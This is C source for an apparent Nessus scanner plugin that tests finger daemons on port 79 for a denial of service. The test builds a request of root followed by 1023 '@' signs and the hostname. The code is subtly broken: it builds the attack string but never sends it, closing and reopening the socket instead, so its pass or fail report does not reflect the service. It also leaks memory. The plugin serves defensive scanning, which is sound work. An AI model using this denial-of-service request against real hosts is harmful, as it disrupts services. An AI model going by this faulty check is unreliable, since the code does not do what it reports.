#include <config.h>
#include <nessuslib.h>
#include <stdio.h>
#ifdef HAVE_STRING_H
#include <string.h>
#endif /* HAVE_STRING_H */

#ifndef NESSUS_NT
#include <sys/types.h>
#include <sys/socket.h>  
#else
#include <windows.h>
#endif

#define NAME "recursive finger"
#define DESC "\
It is possible to lead to a denial of service using the\n\
recursive finger method, which consists in sending to the remote\n\
host a finger request containing a lot of '@'\n\n\
Risk factor : Medium"
#define COPYRIGHT "no copyright"
#define SUMM "denial of service using finger root@@@@(...)@host"


PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_DENIAL);
	plug_set_family(desc, "Denial of Service");
	return(0);
}


PlugExport int plugin_run(struct arglist * args);	
PlugExport int plugin_run(struct arglist * args)
{
	
	int soc;
	char * buffer;
	char * msg;
	if(host_get_port_state(args, 79)<=0)return(0);  
	soc = open_sock_tcp(args, 79);
	if(soc<0)return(0);
	buffer = emalloc(1024);
	msg = emalloc(1024+200+strlen(plug_get_hostname(args)));
	memset(buffer, '@', 1023);
	sprintf(msg, "root%s%s\n", buffer, plug_get_hostname(args));
	closesocket(soc);
	soc = open_sock_tcp(args, 79);
	if(soc<0)post_hole(args, 79, "Performed a denial of service against the\
remote host using the recursive finger method\n\n\
Solution : remove this service or upgrade your finger daemon");
	else closesocket(soc);
        efree(&buffer);
	return(0);
}

